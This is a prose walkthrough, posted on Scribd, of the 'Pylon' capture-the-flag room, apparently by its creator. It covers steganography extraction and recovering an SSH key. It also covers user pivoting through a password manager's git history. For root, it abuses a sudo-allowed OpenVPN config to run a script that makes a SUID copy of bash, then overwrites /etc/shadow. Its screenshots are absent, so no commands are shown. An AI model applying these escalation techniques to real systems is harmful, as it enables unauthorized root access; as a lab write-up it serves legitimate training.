Scribd
Upload
325 views7 pages

Pylon CTF

The document details the process of solving a capture the flag scenario. Key steps include: 1. Analyzing files extracted from an initial image, including decoding base64 and gzip files to obtain an SSH key. 2. Using the key to connect to a server on port 222 and cracking a password to reveal flags and access another user account. 3. Investigating git history and decrypting database files to gain more passwords. 4. Editing an OpenVPN config file to run a script with root privileges and escalating access on the system. 5. Decrypting further files after obtaining root shell access.

Uploaded by

AleNoAutoPlz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
325 views7 pages

Pylon CTF

The document details the process of solving a capture the flag scenario. Key steps include: 1. Analyzing files extracted from an initial image, including decoding base64 and gzip files to obtain an SSH key. 2. Using the key to connect to a server on port 222 and cracking a password to reveal flags and access another user account. 3. Investigating git history and decrypting database files to gain more passwords. 4. Editing an OpenVPN config file to run a script with root privileges and escalating access on the system. 5. Decrypting further files after obtaining root shell access.

Uploaded by

AleNoAutoPlz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

- We enter the room and download the file provided, pepper.

jpg

- Running exiftool on the file we are provided with a link.

- Visiting the link takes us to CyberChef with a recipe already in place.


- Further analysis of the file reveals a file is embedded with steghide.
- With either brute force using rockyou, or just guessing you can extract the file ‘lone’

- Checking the file type with ‘file’ reveals ASCII text

- The file contains what appears to be base64 encoded content.

- Decoding the file, results in what appears to be a gzip file, possibly a tar archive?

- This SSH key is unencrypted and will allow us to connect to the machine.
- Next step is port mapping, using rustscan, reveals the following TCP ports open
- Ports 22 and 222 both appear to be running OpenSSH, lets try and connect to them.

- That’s a no go on port 22 let’s try 222.

- We are presented with this screen


- This is where the CyberChef recipe will probably come in to play.
- If you are good at guessing, it will be the same password as the stegfile, so let’s try that.

- We enter the encryption key and it gives us this screen.


- I try to escape to the shell, but cannot, other people may have more luck / expertise to do this.
- Selecting 1 we are given 2 options

- We now have flag1 and a password, so let’s try those on port 22.

- Now we have user1.flag

- We also have a couple more interesting file’s / folders to look at, one being a file encrypted with gpg the
other being a folder with the sources for the password manager and a .git folder.

- Check the history.


- Nothing immediately obvious pops up in the pylon folder, so let’s see if there are any files in a previous
commit that may help us.

- We can see some files have changed here and an interesting .db file appears.
- Running the pyLon_pwMan.py with python3, the program informs us that the database file exists and prompts us
for the encryption key, now if you are a good guess, you will try the same encryption key as before.

- This leads you to a password for the gpg key to decrypt the file, if you are not a good guess you will likely
get stuck here and not progress, this older version uses a much more insecure encryption method, xoring the
password with the MD5 hash of the passphrase, since there is only one password in the database, your next move
would be to brute force the SHA512 hash stored in the .db file, which would probably prove frivolous as it is
using a reasonably strong passphrase, I may be wrong but I don’t think it’s feasible to do this.

- Decrypting the ‘note_from_pood.gpg’ file gives us the password to shift horizontally to another user, but
first let’s see what lone can do with sudo.

- Interesting we can run openvpn as root, but only using a specific config file, pood has asked us to fix the
config and has given us access to his account, so let’s switch to him.

- Now we have user2 flag, and we can see that pood can edit the openvpn config file that lone was allowed to
run, so what now?
- Reading the man page for openvpn we see that we can run a script on successful connection to a VPN server, so
lets write a script to take control of the machine.

- There are many ways to do this, but the usual trick of copying /bin/bash to /tmp and setting the binary SUID
should do the job, I knock up a quick shell script.

- Don’t forget to make it executable, now we must edit the config file.

- Add a couple of lines to the config and save, now exit out of the su shell and go back to lone, connect to the
openvpn server and our script should run as root on successful connection.

- The connection was successful so let’s disconnect and check out /tmp/bash.

- As expected, the binary was created, we can now escalate to root.


- Great another gpg encrypted file, I can see a lot of people tearing their hair out over this one, since we are
only effectively root we cannot decrypt his message, so we will need a proper shell.

- The way I dealt with that was to edit /etc/shadow, I copied a known hash into root’s position and then all we
can su to root, in this case I just copy pasted pood’s hash as it is already known and easy to grab.

- Notice I also overwrote pylon’s hash, just for fun, you can go this way too because pylon is in the sudo
group.

- One last thing to do.

- Hope you enjoyed the room, my fist one, I have some other ideas up my sleeve so stay tuned.

You might also like